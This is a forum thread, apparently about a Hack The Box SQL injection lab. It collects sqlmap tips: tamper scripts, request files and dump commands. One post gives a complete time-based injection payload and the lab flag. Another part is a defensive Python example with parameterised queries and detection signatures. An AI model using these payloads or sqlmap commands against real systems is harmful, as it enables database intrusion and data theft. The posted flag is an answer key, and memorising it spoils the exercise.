The 4 is correct, worked for me. You can PM your flag chars (randomised if you want) and I could help.
Otherwise try again, the 1337 reads right to me.
Finally got it, whooa a lot of requests to be made. Be patient, if anyone needs help, DM me.
It will seem that the protection is not present till you get stuck in errors.
Just use -v 6 to see what's going on, and see what was taught for such scenarios:
see what is being sent and received.
For anyone who is still struggling: do not tamper with the POST request you get. Save the original one and use it with the -r switch. Everything from then on should be straightforward. If it's not, something is wrong with the request. I tampered with it and it made me absolutely crazy, not being able to figure out what was wrong and how to fix it.
Here are some tips to keep in mind:
Take things one step at a time and don’t try to apply all the hints and tips at once.
If you find yourself struggling to make progress, ensure that you are executing the hints in the right context and with the correct command.
If you can’t seem to make any progress, start from scratch and begin with the basics.
Remember that the two most important things to keep in mind are the techniques and the tamper option.
Very nicely put. Don't forget you don't need to apply everything SQLMAP suggests; you can try one thing at a time and check the results after. In short:
if SQLMAP suggests adding 2 things, just add 1 of them and check.
sqlmap -r <request file> --tamper=<script> -T <table name> --dump --batch (This is a format, not an answer)
Also, the flag you find will throw some error; for that, just remove the b and put _ there in the flag.
Happy hacking
This one was difficult, get the post request manually, and use the ‘between’ tamper.
Tips After Finding the Flag:
1. Identify the Website Technology.
2. Analyze Each Page Source Code: use CTRL + F to search for files with the website's file extension (e.g., .php).
3. Understand the Page Actions.
4. Intercept and Save the Request.
5. Use SQLMap with the Tamper Script: sqlmap -r <file> --batch --tamper=<tamper script used in the module> (e.g., between, space2comment; for several scripts use --tamper=<tamper1>,<tamper2>).
6. Wait for Results.
7. Determine the Payload Type.
8. Run Multiple Tabs for Faster Analysis: --technique=<types> --no-cast --dbs
9. Analyze and Extract Data: -D <database_name> --tables for each tab to list the tables and proceed with further steps as needed.
I hope it helps you other than to be useless words.
mdso999
The solution:
Check the source code of the page: /shop.html
At the bottom, you will find a JS script which calls the file "/action.php" with the JSON payload {id:1}
The SQLi payload: {"id":"1, 313, 1,712,IF(1=(SELECT 1 FROM final_flag WHERE content LIKE 'HTB{N07\_50\_H4RD\_R16H7?!}'), SLEEP(2), 1 ))#"}
Flag: HTB{N07_50_H4RD_R16H7?!}
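The endpoint mdso999 describes (action.php reading a JSON {id:1}) is exploitable because the id value lands in the SQL text unchanged. As an added example that is not from this thread or from the HTB module, here is a Python/sqlite3 stand-in for that lookup in its vulnerable and hardened forms, plus a request-body screen that recognises the two tamper-script signatures the thread relies on (between rewrites comparisons into NOT BETWEEN 0 AND, space2comment replaces spaces with /**/) and the SLEEP() primitive in the posted payload. The product table, its columns and the sample request bodies are constructed assumptions, not the module's real data.

```python
import json
import re
import sqlite3

# Constructed stand-in for the shop's product lookup (assumption: the real
# table and columns behind /action.php are not shown anywhere in the thread).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "Laptop", 1200), (2, "Mouse", 20), (3, "Monitor", 300)])
    return db


def lookup_unsafe(db, body):
    """The flaw the thread exploits: the JSON 'id' is pasted straight into the SQL text."""
    item = json.loads(body)["id"]
    sql = f"SELECT id, name FROM products WHERE id = {item}"   # string building, no binding
    return db.execute(sql).fetchall()


def lookup_safe(db, body):
    """Hardened form: enforce the type the front end actually sends ({id:1} is a number),
    then bind the value as a query parameter so it can never become SQL syntax."""
    item = json.loads(body)["id"]
    if isinstance(item, bool) or not isinstance(item, int):
        raise ValueError("id must be an integer")
    return db.execute("SELECT id, name FROM products WHERE id = ?", (item,)).fetchall()


# Patterns a WAF or log review can match once the body is normalised. The SLEEP
# pattern covers the time-based payload mdso999 posted; the others cover the
# sqlmap tamper scripts named in the thread and a plain tautology.
SIGNATURES = {
    "time-based (SLEEP)": re.compile(r"\bSLEEP\s*\(", re.I),
    "between tamper": re.compile(r"\bNOT\s+BETWEEN\s+0\s+AND\b", re.I),
    "tautology (OR 1=1)": re.compile(r"\bOR\s+1\s*=\s*1\b", re.I),
}


def flag_request(body):
    """Return the signature names matched by one request body (empty list = nothing seen).
    space2comment is detected on the raw body, then its /**/ tokens are turned back
    into spaces so the between-tamper pattern is visible when both scripts are stacked."""
    hits = ["space2comment tamper"] if "/**/" in body else []
    normalised = body.replace("/**/", " ")
    hits.extend(name for name, rx in SIGNATURES.items() if rx.search(normalised))
    return hits


# Constructed sample bodies, standing in for a reverse-proxy log that records POST data.
SAMPLE_BODIES = [
    '{"id":1}',
    '{"id":"1 OR 1=1"}',
    '{"id":"1 AND SLEEP(2)"}',
    '{"id":"1/**/AND/**/1/**/NOT/**/BETWEEN/**/0/**/AND/**/1"}',
]

if __name__ == "__main__":
    db = make_db()
    print("unsafe, id=1:         ", lookup_unsafe(db, SAMPLE_BODIES[0]))
    print("unsafe, tautology:    ", lookup_unsafe(db, SAMPLE_BODIES[1]))   # every row leaks
    print("safe, id=1:           ", lookup_safe(db, SAMPLE_BODIES[0]))
    try:
        lookup_safe(db, SAMPLE_BODIES[1])
    except ValueError as exc:
        print("safe, tautology:       rejected:", exc)
    for body in SAMPLE_BODIES:
        print(f"{body!s:60} -> {flag_request(body) or 'clean'}")
```

The type check in lookup_safe matters as much as the parameter binding: once the handler insists on an integer, the string payloads seen in this thread are rejected before any SQL is built, and binding covers the remaining cases where a string field is legitimately needed.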
Guys, copy the request in JSON format (where the id parameter is) and use it for scanning with the -r request.txt flag. Also, add --tamper=between,space2comment, and everything will work.
sqlmap.py -r req.txt --batch --tamper=between,space2comment --dbs